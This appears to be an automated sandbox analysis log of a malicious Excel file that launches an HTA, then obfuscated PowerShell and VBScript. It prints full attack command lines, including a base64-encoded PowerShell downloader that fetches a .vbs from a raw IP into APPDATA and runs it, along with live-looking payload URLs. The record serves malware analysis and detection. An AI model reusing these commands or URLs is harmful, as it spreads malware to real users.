      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536446147.000000001AD05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
      Source: powershell.exe, 0000000F.00000002.533779674.00000000025C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com
      Source: powershell.exe, 0000000F.00000002.533779674.00000000025C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNd
      Source: powershell.exe, 00000008.00000002.528236429.0000000012461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000008.00000002.528236429.0000000012461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000008.00000002.528236429.0000000012461000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
      Source: mshta.exe, 00000004.00000002.501048315.0000000000423000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500300099.0000000000423000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ljg.cl/
      Source: mshta.exe, 00000004.00000002.501048315.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500300099.000000000040B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501030236.00000000003AA000.00000004.00000020.00020000.00000000.sdmp, Swiftcopy.xla.xlsx, 73B30000.0.dr | String found in binary or memory: https://ljg.cl/G5dF?&rank=uttermost&fan=decorous&barracks=drunk&kettledrum=flippant&banana=loose&bat
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ljg.cl/P
      Source: mshta.exe, 00000004.00000002.501048315.0000000000423000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500300099.0000000000423000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ljg.cl/ersiM
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ljg.cl/w
      Source: powershell.exe, 00000008.00000002.528236429.0000000012461000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
      Source: mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2B4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536446147.000000001AC30000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
      Source: unknown | Network traffic detected: HTTP traffic on port 49163 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49168
      Source: unknown | Network traffic detected: HTTP traffic on port 49165 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49165
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49163
      Source: unknown | Network traffic detected: HTTP traffic on port 49168 -> 443
      Source: unknown | HTTPS traffic detected: 152.231.117.86:443 -> 192.168.2.22:49163 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 152.231.117.86:443 -> 192.168.2.22:49165 version: TLS 1.2
      Source: C:\Windows\System32\mshta.exe | Window created: window name: CLIPBRDWNDCLASS

      System Summary

      Source: Process Memory Space: powershell.exe PID: 3044, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: Process Memory Space: powershell.exe PID: 2036, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: Swiftcopy.xla.xlsx | OLE: Microsoft Excel 2007+
      Source: 73B30000.0.dr | OLE: Microsoft Excel 2007+
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestthings[1].hta
      Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'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'+[CHaR]34+'))')))"
      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_000007FE89A6352E
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_000007FE89A97FC6
      Source: Swiftcopy.xla.xlsx | OLE indicator, VBA macros: true
      Source: Swiftcopy.xla.xlsx | Stream path 'MBD003994AC/\x1Ole' : https://ljg.cl/G5dF?&rank=uttermost&fan=decorous&barracks=drunk&kettledrum=flippant&banana=loose&bathroomB>EOxdsXQo'8]q`I3A$WUp6-av[B:M70l'}N>5r)'E#vXAGr`IJ)J-0J3/Cp}[6=<:s(IiHzd$VtyiN8ABuRZC3CbTyxC8cRUBpr6VOMlytfqsT22wCOz34yQV1WnSDr57SDsnn\T$=Bv9C@7z
      Source: 73B30000.0.dr | Stream path 'MBD003994AC/\x1Ole' : https://ljg.cl/G5dF?&rank=uttermost&fan=decorous&barracks=drunk&kettledrum=flippant&banana=loose&bathroomB>EOxdsXQo'8]q`I3A$WUp6-av[B:M70l'}N>5r)'E#vXAGr`IJ)J-0J3/Cp}[6=<:s(IiHzd$VtyiN8ABuRZC3CbTyxC8cRUBpr6VOMlytfqsT22wCOz34yQV1WnSDr57SDsnn\T$=Bv9C@7z
      Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
      Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 2466
      Source: Process Memory Space: powershell.exe PID: 3044, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: Process Memory Space: powershell.exe PID: 2036, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: Swiftcopy.xla.xlsx, 73B30000.0.dr | Binary or memory string: .vBP$
      Source: classification engine | Classification label: mal100.phis.expl.evad.winXLSX@16/29@6/3
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$Swiftcopy.xla.xlsx
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR8F15.tmp
      Source: Swiftcopy.xla.xlsx | OLE indicator, Workbook stream: true
      Source: 73B30000.0.dr | OLE indicator, Workbook stream: true
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................m.......m.....}..w.............................1......(.P..............3......................@...............Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w....@.......\.......................(.P.....,.......<.......(...............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................@.......}..w............X8h........l....X.g.....(.P.....,.......<.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w....@.......\.......................(.P.....,.......<.......(...............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................@.......}..w............X8h........l....X.g.....(.P.....,.......<.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.X8h........l....X.g.....(.P.....,.......<............... .......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................@.......}..w............X8h........l....X.g.....(.P.....,.......<.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.....,.......<...............8.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................@.......}..w............X8h........l....X.g.....(.P.....,.......<.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...<...............F.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................@.......}..w............X8h........l....X.g.....(.P.....,.......<...............l.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......@.......}..w............X8h........l....X.g.....(.P.....,.......<.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................@...............0....Z...Wl.....}..w....(.......@E......^...............(.P.....,.......<.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................@....................Z...Wl.....}..w....(.......@E......^...............(.P.....,.......<.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................m.......m.....}..w.............................1......(.P..............3.......................F..............Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w.....F......\.......................(.P.............(.......HH..............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia.....?..l.....0......(.P.............(...............`.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w.....F......\.......................(.P.............(.......HH..............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.3.3.....?..l.....0......(.P.............(........G......$.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia.....?..l.....0......(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia.....?..l.....0......(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia.....?..l.....0......(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia.....?..l.....0......(.P.............(...............T.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........F......}..w............Pia.....?..l.....0......(.P.............(........G..............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia.....O..l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w.....F......\.......................(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................P.a.r.a.m.e.t.e.r. .n.a.m.e.:. .b.y.t.e.s."......Wr.....(.P.............(.......8.......,.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w.....F......\.......................(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.8.3.....O..l.....Wr.....(.P.............(.......8.......$.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia.....O..l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia.....O..l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia.....O..l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia.....O..l.....Wr.....(.P.............(...............f.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........F......}..w............Pia.....O..l.....Wr.....(.P.............(.......8...............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......,.l.....Wr.....(.P.............(...............j.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................_,.l....}..w.....F......\.......................(.P.............(.......h...............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.1.3......,.l.....Wr.....(.P.............(...............$.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......,.l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......,.l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......,.l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......,.l.....Wr.....(.P.............(...............`.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........F......}..w............Pia......,.l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................_,.l....}..w.....F......\.......................(.P.............(.......h...............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......,.l.....Wr.....(.P.............(...............j.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.6.0......,.l.....Wr.....(.P.............(...............$.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......,.l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......,.l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......,.l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......,.l.....Wr.....(.P.............(...............`.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........F......}..w............Pia......,.l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................F..............F.a.l.s.e.l.....}..w....X.......@E......^...............(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................F..................l.s.e.l.....}..w....X.......@E......^...............(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......+.l.....Wr.....(.P.............(...............j.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.......................+.l....}..w.....F......\.......................(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.6.1.6......+.l.....Wr.....(.P.............(...............$.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.......................+.l....}..w.....F......\.......................(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......+.l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......+.l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......+.l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......+.l.....Wr.....(.P.............(...............`.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........F......}..w............Pia......+.l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia........l.....Wr.....(.P.............(...............j.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................?..l....}..w.....F......\.......................(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.6.7.0........l.....Wr.....(.P.............(.......(.......$.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................?..l....}..w.....F......\.......................(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia........l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia........l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia........l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia........l.....Wr.....(.P.............(...............`.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........F......}..w............Pia........l.....Wr.....(.P.............(.......(...............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia........l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................_..l....}..w.....F......\.......................(.P.............(.......h...............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia........l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................_..l....}..w.....F......\.......................(.P.............(.......h...............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia........l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia........l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.8.2.1........l.....Wr.....(.P.............(...............$.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia........l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia........l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia........l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia........l.....Wr.....(.P.............(...............j.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........F......}..w............Pia........l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................U.n.a.b.l.e. .t.o. .f.i.n.d. .t.y.p.e. .[.d.n.l.i.b...I.O...H.o.m.e.]...(.......X.......H.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.......................-.l....}..w.....F......\.......................(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write (UTF-16 text; the rest of the buffer is non-printable): At line:1 char:900
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write (UTF-16 text; the rest of the buffer is non-printable): ...untimeException
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write (UTF-16 text; the rest of the buffer is non-printable): At line:1 char:933
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: C:\Windows\System32\mshta.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\mshta.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\mshta.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\mshta.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
